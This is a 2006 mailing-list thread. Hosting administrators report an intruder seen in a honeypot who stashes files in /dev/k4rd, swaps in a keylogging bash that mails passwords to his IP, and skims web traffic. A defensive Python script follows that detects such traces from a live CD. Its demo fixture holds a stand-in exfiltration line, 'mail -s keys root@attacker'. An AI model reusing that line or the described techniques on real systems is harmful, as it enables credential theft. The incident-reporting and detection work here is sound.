Re: Sagonet - Failing miserably with network security Someone needs to handle this.
Chris,
What kind of activity are you seeing once he's in the servers? At Webair we're primarily web hosting, and some customer boxes were compromised over recent months.
I'm curious because you say he was very patient and methodical. I've asked around with a few friends and they have seen this guy too, just as in your case.
Anyway, it fits the profile of the guy we had. He was inserting references to megacount.net, and some obfuscated JavaScript code. He has been hard to get rid of.
Sincerely,
----------------------------------------
Brian Hourigan
Lead Technical Support Specialist / Programming Development Team
Webair Internet Development, Inc.
Fax: 516.938.5100
http://www.webair.com
----------------------------------------
We are interested in any feedback you might have about the service you received. Please contact our technical support consumer care manager directly at 1.866.WEBAIR1 or e-mail customercare@webair.com
On Sun, 29 Oct 2006, Chris Jester wrote:
65.110.62.120
Sagonet,
We have a serious hacker here who is ACTIVELY engaged in logins on our network (have him in a honeypot at the moment). He is running exploits from your network, and I have also been hearing from others that you have been notified of this a few times yet have done nothing about it. Can we get someone to handle this immediately please?
This hacker has rooted at least 35 servers on a friend's network (friendly competitor) and now he's scanning ours...
This is what was said by my friend after contacting you guys about this: "Good... They will not listen... I have provided them logs, screen shots, etc..."
Additionally, I would LOVE to know what is on that server... this guy is not to be taken lightly, he is VERY methodical and patient. He's probably owning your network too.
[root@mail /home]# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN
tcp        0      0 :::38300                    :::*                        LISTEN
tcp        0      0 ::ffff:66.11.112.15:38300   ::ffff:65.110.62.120:59979  ESTABLISHED
In the honeypot server we have him in, he is storing files in /dev/k4rd. Bash has been replaced with a "key logging" bash; he gets everything you type, passwords included, emailed back to him at root@65.110.62.120. There seem to be A LOT of files in /dev/k4rd, a bin directory and so on. He hacked the kernel so well that it's VERY difficult to track his moves without booting off another drive first. We boot off a live Linux CD environment to do studies on what he is up to, but before we do that we let him hack it up nicely so we get all his tricks.

Note: he cannot really touch any other servers as he is stuck in a faked network environment at this moment. Pinging yahoo.com for example will generate a reply and a faked DNS entry, but the packets never leave the zone he is in.

His motivation seems to be to gather nats affiliate and customer data. He has an exploit that works on any and all nats installations. We're not going to release that until nats has been notified and had time to secure it.

We're also seeing "traffic skimming" being attempted. He is searching for scripts (that we put there just to see what he does with them) that log traffic hits and so on. He modifies these scripts so that randomly, but rarely, hits are redirected to a web site called cgi-dnsl.com (porn).

I don't mean to be a brat to Sagonet, but this is always the source of this hacker and his home never changes, it's always on that single IP.

Chris Jester
NJesterIII
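The post describes two of the intruder's tricks (a stash directory under /dev and a replaced /bin/bash) and the right way to look for them: boot the box from a live CD, because the rootkitted kernel lies to any tool run on the live system. The script below is an added example of that offline check, not code from the original post or from anyone on the thread. It takes the mount point of the compromised disk (mounted read-only from the live CD), reports regular files and unexpected top-level directories under its /dev (a real /dev holds device nodes, symlinks and a handful of known directories, not plain files), and compares the hashes of listed binaries against a baseline taken from a known-good copy. The directory names in KNOWN_DEV_DIRS and the demo tree built by build_demo_root() (a "bsh" file under dev/k4rd/bin and a tampered bin/bash) are constructed for the demonstration, not observations from the post.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Directories that legitimately appear directly under /dev on a typical Linux box.
# Assumption for the example: extend this for your own distribution.
KNOWN_DEV_DIRS = {"pts", "shm", "disk", "mapper", "input", "net", "block", "char",
                  "bus", "mqueue", "hugepages", "snd", "dri", "cpu", "fd"}


def find_suspicious_dev_entries(dev_root, known_dirs=KNOWN_DEV_DIRS):
    """Walk <mount>/dev and return anything that should not be there.

    Flags every regular file (device nodes are char/block, never regular files)
    and every top-level directory whose name is not in known_dirs, e.g. /dev/k4rd.
    Uses lstat so symlinks such as /dev/stdin are not followed.
    """
    dev_root = Path(dev_root)
    hits = []
    for path in sorted(dev_root.rglob("*")):
        st = path.lstat()
        if stat.S_ISREG(st.st_mode):
            hits.append(str(path))
        elif stat.S_ISDIR(st.st_mode) and path.parent == dev_root and path.name not in known_dirs:
            hits.append(str(path) + "/")
    return hits


def sha256_of(path):
    """Stream a file through SHA-256 so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_binaries(mount_root, baseline):
    """Compare files under mount_root with a {relative path: sha256} baseline.

    The baseline must come from a trusted source (distribution package, or a
    clean install of the same version), never from the suspect system itself.
    Returns {relative path: reason} for every missing or modified file.
    """
    findings = {}
    for rel, expected in baseline.items():
        p = Path(mount_root) / rel
        if not p.exists():
            findings[rel] = "missing"
            continue
        actual = sha256_of(p)
        if actual != expected:
            findings[rel] = "modified (sha256 %s... != baseline %s...)" % (actual[:12], expected[:12])
    return findings


# --- constructed demo data, standing in for a disk mounted from a live CD ---
CLEAN_BASH = b"#!/bin/sh\n# clean bash stand-in\n"
CLEAN_LS = b"#!/bin/sh\n# clean ls stand-in\n"
DEMO_BASELINE = {
    "bin/bash": hashlib.sha256(CLEAN_BASH).hexdigest(),
    "bin/ls": hashlib.sha256(CLEAN_LS).hexdigest(),
}


def build_demo_root():
    """Create a throwaway mount root that mimics the compromised box and return its path."""
    root = Path(tempfile.mkdtemp(prefix="suspect-mount-"))
    (root / "dev" / "pts").mkdir(parents=True)          # legitimate
    os.symlink("/proc/self/fd/0", root / "dev" / "stdin")  # legitimate symlink
    (root / "dev" / "k4rd" / "bin").mkdir(parents=True)  # intruder's stash
    (root / "dev" / "k4rd" / "bin" / "bsh").write_bytes(b"\x7fELF-trojaned-shell")
    (root / "bin").mkdir()
    (root / "bin" / "bash").write_bytes(CLEAN_BASH + b"mail -s keys root@attacker\n")  # tampered
    (root / "bin" / "ls").write_bytes(CLEAN_LS)          # untouched
    return str(root)


if __name__ == "__main__":
    mount = build_demo_root()
    for hit in find_suspicious_dev_entries(os.path.join(mount, "dev")):
        print("suspicious /dev entry:", hit)
    for rel, why in verify_binaries(mount, DEMO_BASELINE).items():
        print("binary check:", rel, why)
```

On a real case, run it from the live CD as `find_suspicious_dev_entries("/mnt/suspect/dev")` and `verify_binaries("/mnt/suspect", baseline)`, with the baseline generated from package-manager copies on a clean host; anything reported is a lead for closer inspection, not proof by itself, since a rootkit can also hide in places this check does not cover (kernel modules, libraries, the ssh daemon).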